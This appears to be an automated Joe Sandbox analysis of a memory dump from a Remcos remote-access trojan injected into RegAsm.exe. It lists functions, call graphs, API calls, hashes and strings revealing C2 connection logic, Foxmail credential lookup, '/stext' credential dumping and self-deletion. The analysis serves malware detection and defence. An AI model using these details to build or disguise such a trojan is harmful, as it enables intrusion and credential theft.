                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID:
                                                                                • API String ID: 1815803762-0
                                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                Function 004489D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                Strings
                                                                                • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$FileSystem
                                                                                • String ID: GetSystemTimePreciseAsFileTime
                                                                                • API String ID: 2086374402-595813830
                                                                                • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 0040EA00 Relevance: 63.8, APIs: 15, Strings: 21, Instructions: 795COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 99 40ec27-40ec3d call 401fab call 4139e4 79->99 89 40ec47-40ec49 80->89 90 40ec4e-40ec55 80->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 99->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 148 40ecac call 40729b 144->148 148->108 177->178 204 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->204 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->234 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 190 40ee59-40ee7d call 40247c call 434829 183->190 184->190 212 40ee8c 190->212 213 40ee7f-40ee8a call 436f10 190->213 204->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 272 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->272 287 40f017-40f019 234->287 288 40effc 234->288 272->234 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 272->286 286->234 306 40ef2a 286->306 291 40f01b-40f01d 287->291 292 40f01f 287->292 290 40effe-40f015 call 41ce2c CreateThread 288->290 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 291->290 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 367 40f207-40f21a call 401e65 call 401fab 357->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 406 40f293-40f29d CreateThread 403->406 407 40f29f-40f2a6 403->407 406->407 408 40f2b4-40f2bb 407->408 409 40f2a8-40f2b2 CreateThread 407->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                APIs
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                • String ID: 8SG$8SG$@u4$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-4CT19T$Software\$User$dMG$del$del$exepath$licence$license_code.txt$p54$34
                                                                                • API String ID: 2830904901-1950504982
                                                                                • Opcode ID: ea8aa897b517b46e2c0f88cc73235cbabdde2d4f89d4bb93d5e68e572d9e21cb
                                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                • Opcode Fuzzy Hash: ea8aa897b517b46e2c0f88cc73235cbabdde2d4f89d4bb93d5e68e572d9e21cb
                                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                                Function 00414F65 Relevance: 49.8, APIs: 5, Strings: 23, Instructions: 809sleepnetworkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 612 415220-415246 call 402093 * 2 call 41b580 606->612 613 41524b-415260 call 404f51 call 4048c8 606->613 630 415ade-415af0 call 404e26 call 4021fa 607->630 612->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 613->629 613->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 643 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->643 644 415b18-415b20 call 401e8d 630->644 643->644 644->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-415a45 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 695->702 701->702 947 415a4a-415a51 702->947 948 415a53-415a5a 947->948 949 415a65-415a6c 947->949 948->949 952 415a5c-415a5e 948->952 950 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->950 951 415a6e-415a73 call 40b08c 949->951 963 415aac-415ab8 CreateThread 950->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 950->964 951->950 952->949 963->964 964->630
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,p54,00000000), ref: 00414FB6
                                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                • String ID: | $%I64u$5.1.1 Pro$8SG$@u4$@z4$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-4CT19T$TLS Off$TLS On $dMG$hlight$name$p54$34$NG$NG
                                                                                • API String ID: 524882891-2637223880
                                                                                • Opcode ID: 789394b93ee2d4258008b9022465b51eafac81063400420677acc8a61a485141
                                                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                • Opcode Fuzzy Hash: 789394b93ee2d4258008b9022465b51eafac81063400420677acc8a61a485141
                                                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                                Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1093 412e43-412e5f call 401f04 call 41c516 1091->1093 1092->1093 1100 412e61-412e73 call 401f04 DeleteFileW 1093->1100 1101 412e79-412e7b 1093->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1107 412e99-412eab call 406b63 1103->1107 1104->1103 1106 412e81-412e86 1104->1106 1106->1103 1106->1107 1110 412f01-412f20 call 401f09 * 3 1107->1110 1111 412ead-412ebb call 406b63 1107->1111 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1137 412eff 1123->1137 1137->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                                • API String ID: 1223786279-2576077980
                                                                                • Opcode ID: 9652fc645b0b5fb630b9200ff10863c4facc191bf55e184344104a03025868ea
                                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                • Opcode Fuzzy Hash: 9652fc645b0b5fb630b9200ff10863c4facc191bf55e184344104a03025868ea
                                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                                Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                • API String ID: 672098462-2938083778
                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1308 414f0a-414f0d 1295->1308 1309 414ebd-414ec7 GetProcAddress 1295->1309 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1303 414ed4-414ee5 GetProcAddress 1300->1303 1305 414ee7-414eeb 1303->1305 1306 414eef-414ef2 FreeLibrary 1303->1306 1305->1303 1310 414eed 1305->1310 1307 414ef4-414ef6 1306->1307 1307->1308 1311 414ef8-414f08 1307->1311 1308->1289 1312 414ec9-414ecc FreeLibrary 1309->1312 1313 414ece-414ed0 1309->1313 1310->1307 1311->1308 1311->1311 1312->1313 1313->1300 1313->1308
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
